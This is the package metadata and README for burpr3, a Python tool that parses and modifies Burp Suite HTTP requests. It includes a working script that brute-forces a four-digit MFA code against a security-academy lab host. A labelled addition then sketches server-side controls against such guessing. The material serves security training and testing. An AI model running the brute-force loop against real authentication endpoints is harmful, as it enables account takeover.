Metadata-Version: 2.1
Name: burpr3
Version: 0.0.2
Summary: A Burp Suite request parser, used for aid in assessing application security functionality.
Home-page: https://github.com/krystianbajno/burpr
Author: Krystian Bajno
Author-email: krystian.bajno@gmail.com
License: MIT
Keywords: burp suite burpsuite request parser
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Description-Content-Type: text/markdown
License-File: LICENSE.txt

# What is it
A Burp Suite request parser that aids in assessing application security functionality.

# Why I wrote it
To bypass the throttling that Burp Suite Community applies to Intruder.

# Usage
Use the `burpr.py` module to parse a request copied from Burp Suite, then use the resulting object to extract the headers and body.

Requests can be parsed from strings and from .txt files.

```python
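import burpr
import httpx

# Load from string (req_string holds the raw request text copied from Burp Suite)
req = burpr.parse_string(req_string)

# Load from file (req_file_path is the path to a .txt file containing the raw request)
req = burpr.parse_file(req_file_path)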

# clone the request
req_clone = burpr.clone(req)

# change protocol to http1.1
req_clone.set_protocol(burpr.protocols.HTTP1_1)

# change transport to http
req_clone.set_transport(burpr.transports.HTTP)

# modify the header
req_clone.set_header("Cookie", "session=modified_session_cookie")

# modify the parameter
req_clone.set_parameter("post-param", "AAABBBCCC")

# remove parameter
req_clone.remove_parameter("post-param")

# remove header
req_clone.remove_header("Cookie")

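# adjust Content-Length for parameter change
burpr.prepare(req_clone)

# send the modified clone, matching the client to the clone's protocol
client = httpx.Client(http2=req_clone.is_http2)
res = client.post(req_clone.url, headers=req_clone.headers, data=req_clone.body)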
```

# Examples
## Brute force broken MFA
```python
import burpr
import httpx
import itertools

burp_request = r"""POST /login2 HTTP/2
Host: xxxx.web-security-academy.net
Cookie: verify=carlos; session=xxxx
Content-Length: 13
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://xxxx.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxx.web-security-academy.net/login2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

mfa-code=4321
"""

def generate_pin_numbers():
  # All 4-digit codes from "0000" to "9999"
  return [''.join(digits) for digits in itertools.product("0123456789", repeat=4)]

def brute_force_broken_mfa():
  # Parse request from string
  req = burpr.parse_string(burp_request)

  # Create http client and check the protocol used
  client = httpx.Client(http2=req.is_http2)

  for pin in generate_pin_numbers():
    # Modify the mfa-code parameter
    req.set_parameter("mfa-code", pin)

    # Send the request
    res = client.post(req.url, headers=req.headers, data=req.body)

    print(res.status_code, pin)
    
    if (res.status_code != 200):
      break

brute_force_broken_mfa()
```
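
The loop above only gets through the 10,000-code space because the target keeps accepting guesses against the same challenge. The following is an added sketch of the server-side control that closes this, not part of burpr or of the target application; `MfaChallenge`, `guesses_accepted`, `MAX_FAILURES` and `CHALLENGE_TTL` are hypothetical names and assumed policy values.

```python
import hmac
import time

MAX_FAILURES = 5      # assumed policy: failed guesses allowed per challenge
CHALLENGE_TTL = 300   # assumed policy: seconds an issued code stays valid


class MfaChallenge:
    """One pending MFA challenge for one account (hypothetical model)."""

    def __init__(self, code, now=None):
        self.code = code
        self.issued_at = time.time() if now is None else now
        self.failures = 0
        self.locked = False

    def verify(self, submitted, now=None):
        """Return 'ok', 'invalid', 'expired' or 'locked' for one submitted code."""
        now = time.time() if now is None else now
        if self.locked:
            return "locked"
        if now - self.issued_at > CHALLENGE_TTL:
            self.locked = True
            return "expired"
        # Constant-time comparison so response timing does not leak digits.
        if hmac.compare_digest(submitted.encode(), self.code.encode()):
            self.locked = True  # single use: a verified code cannot be replayed
            return "ok"
        self.failures += 1
        if self.failures >= MAX_FAILURES:
            self.locked = True  # require a new login and a newly generated code
        return "invalid"


def guesses_accepted(challenge, candidates):
    """Count how many candidate codes are evaluated before the challenge locks."""
    evaluated = 0
    for pin in candidates:
        result = challenge.verify(pin)
        if result in ("locked", "expired"):
            break
        evaluated += 1
        if result == "ok":
            break
    return evaluated
```

Keep the failure counter against the account rather than the session cookie, otherwise a fresh login resets it.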
